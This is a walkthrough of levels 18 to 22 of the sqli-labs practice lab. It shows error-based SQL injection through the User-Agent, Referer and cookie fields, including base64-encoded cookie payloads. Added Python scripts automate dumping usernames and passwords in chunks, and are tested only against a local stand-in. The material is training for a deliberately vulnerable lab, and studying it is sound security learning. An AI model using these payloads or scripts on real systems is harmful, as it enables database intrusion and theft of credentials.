18. Level 18
Testing shows that appending a single quote to the User-Agent header causes an error: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0'
So we try to close the statement:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0','127.0.0.1','admin')# The error is gone, so the header is the first of three single-quoted values inside a parenthesised list, and single-quote closure works. That makes error-based injection the natural next step.
Database name: 111' or extractvalue(1,concat(0x7e,database(),0x7e)) or '
Table names: 1','1',extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)))#
Column names: 1','1',extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e)))#
Usernames and passwords: 1','1',extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users),0x7e)))#
The amount of data extractvalue() leaks per request is limited: MySQL keeps only the first 32 characters of the XPATH syntax error (30 once the two ~ markers are counted), so anything longer has to be read out in pieces, with substring() or with a narrower WHERE condition.
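An added example (not part of the original write-up) of reading a long result past that limit on Less-18. The closure and value layout are the User-Agent payloads above; the substring() slicing, chunk size, the fake_server() stand-in and its sample rows are assumptions for illustration.

```python
import re

# Added example, not from the original write-up. MySQL keeps only the first
# 32 characters of the "XPATH syntax error" raised by extractvalue(), so a long
# group_concat() result has to be read out in slices with substring().
# The closure and value layout follow the Less-18 User-Agent payloads above
# (first quoted value, two filler values, closing parenthesis, '#').
# Assumptions for illustration: the chunk size, the fake_server() stand-in and
# its sample rows. Against the real lab, send each payload in the User-Agent
# header and hand the HTML response to read_chunk().

ERROR_LIMIT = 32          # characters MySQL keeps in the XPATH error text
CHUNK = ERROR_LIMIT - 2   # what fits between the two '~' markers


def ua_payload(inner_query: str, offset: int, length: int = CHUNK) -> str:
    """User-Agent value for Less-18 that leaks substring(result, offset, length)."""
    sliced = f"substring(({inner_query}),{offset},{length})"
    return f"1','1',extractvalue(1,concat(0x7e,{sliced},0x7e)))#"


_ERR = re.compile(r"XPATH syntax error: '~([^']*)'")


def read_chunk(body: str):
    """Return the leaked slice from a response body, or None if no error is shown."""
    m = _ERR.search(body)
    if m is None:
        return None
    # The closing '~' survives only when the slice was short enough to fit.
    return m.group(1).rstrip("~")


def dump(inner_query: str, send) -> str:
    """Page through the result CHUNK characters at a time until a short slice."""
    result, offset = "", 1
    while True:
        chunk = read_chunk(send(ua_payload(inner_query, offset)))
        if not chunk:
            break
        result += chunk
        if len(chunk) < CHUNK:
            break
        offset += CHUNK
    return result


# --- constructed stand-in for the lab so the loop runs offline ---------------
SAMPLE_ROWS = {  # constructed sample data, not dumped from anywhere
    "select group_concat(username,':',password) from users":
        "Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy",
}
_SLICE = re.compile(r"substring\(\((.*)\),(\d+),(\d+)\)")


def fake_server(user_agent: str) -> str:
    """Emulate MySQL: apply the substring to sample data, truncate the error."""
    m = _SLICE.search(user_agent)
    query, off, ln = m.group(1), int(m.group(2)), int(m.group(3))
    value = SAMPLE_ROWS[query][off - 1: off - 1 + ln]
    return f"XPATH syntax error: '{('~' + value + '~')[:ERROR_LIMIT]}'"


if __name__ == "__main__":
    print(dump("select group_concat(username,':',password) from users", fake_server))
```

The loop stops on the first slice shorter than 30 characters; a result that is an exact multiple of 30 costs one extra request that comes back empty. The same slicing works unchanged for the Referer and cookie payloads of the later levels, only the closure in ua_payload() changes.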
19. Level 19
Following the hint about the Referer header, trial and error shows that a single quote in Referer: http://sqli.labs/Less-19/' causes an error.
Referer: http://sqli.labs/Less-19/','1')# closes it: single quote, one more value, and a closing parenthesis.
This is error-based injection again; next:
Database name: 1',extractvalue(1,concat(0x7e,database(),0x7e)))#
Table names: 1',extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)))#
Column names: 1',extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e)))#
Usernames and passwords: 1',extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users),0x7e)))# The error output is length-limited; to dump everything, add a WHERE condition and fetch the rows in batches.
20. Level 20
After logging in with a username and password the page looks like this:
Capturing the request and trying each field in turn, a single quote in the cookie produces an error: Cookie: uname=admin'
Closing it with Cookie: uname=admin'--+ removes the error, so the value is single-quoted.
So go straight to extractvalue() error-based injection:
Database name: admin' and extractvalue(1,concat(0x7e,database(),0x7e))--+
Table names: admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+
Column names: admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e))--+
Usernames and passwords: admin' and extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users where id<3),0x7e))--+ The error output is length-limited; vary the WHERE condition to dump all accounts.
21. Level 21
After logging in it looks like this:
Many attempts went nowhere until I noticed the cookie Cookie: uname=YWRtaW4, which looked encoded. Base64-decoding it gives Cookie: uname=admin, and sending the base64 encoding of admin' indeed triggers an error:
Cookie: uname=YWRtaW4n (admin' encoded), so the value is single-quoted.
Trial shows that admin')# closes it: single quote plus parenthesis. From here the steps are the same as in the previous levels, except that each payload is base64-encoded before it goes into the cookie.
Database name (base64-encoded payload): YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSkj
Table names: YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSwweDdlKSkj
Column names: YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIGFuZCB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyksMHg3ZSkpIw==
Usernames and passwords: YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUsJzonLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwweDdlKSkj
22. Level 22
After logging in it looks like this:
Similar to the previous level; after some testing, this one turns out to use double-quote closure, admin"#, injected base64-encoded.
As in the previous level, the base64-encoded payloads:
Database name: YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpKSM=
Table names: YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpLDB4N2UpKSM=
Column names: YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycgYW5kIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSwweDdlKSkj
Usernames and passwords: YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwnOicscGFzc3dvcmQpIGZyb20gdXNlcnMpLDB4N2UpKSM=
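An added example (not part of the original write-up) covering the base64 cookie handling of both Level 21 and Level 22: the payload is written as plain SQL with the level's closure and only then encoded, and a captured cookie is decoded the other way. The closures and SQL fragments are the ones shown in those two sections; the function names and the printed cookie lines are assumptions for illustration.

```python
import base64

# Added example, not from the original write-up. Less-21 and Less-22 read the
# uname cookie, base64-decode it and place the result in the query, so the
# payload is written as plain SQL first and encoded as the last step. The
# closures ("')" for Less-21, '"' for Less-22) and the SQL fragments are the
# ones shown above; the function names and the sample cookie lines are
# assumptions for illustration.

DB_NAME = "extractvalue(1,concat(0x7e,database(),0x7e))"
TABLE_NAMES = ("extractvalue(1,concat(0x7e,(select group_concat(table_name) "
               "from information_schema.tables where table_schema='security'),0x7e))")


def cookie_payload(closure: str, sql: str, name: str = "admin") -> str:
    """Base64 form of  <name><closure> and <sql>#  as it goes into the cookie."""
    raw = f"{name}{closure} and {sql}#"
    return base64.b64encode(raw.encode()).decode()


def decode_cookie(value: str) -> str:
    """Inverse direction: recover the SQL from a captured cookie value.
    Pads missing '=' so values copied without padding (YWRtaW4) still decode."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded).decode()


if __name__ == "__main__":
    for level, closure in (("Less-21", "')"), ("Less-22", '"')):
        for sql in (DB_NAME, TABLE_NAMES):
            print(f"{level}: Cookie: uname={cookie_payload(closure, sql)}")
```

Encoding last matters: a '#' or a quote that is base64-encoded survives any URL handling of the cookie untouched, which is why these payloads need no --+ variant. decode_cookie() is also the quick check to run on any cookie value that looks like the YWRtaW4 one before assuming it is opaque.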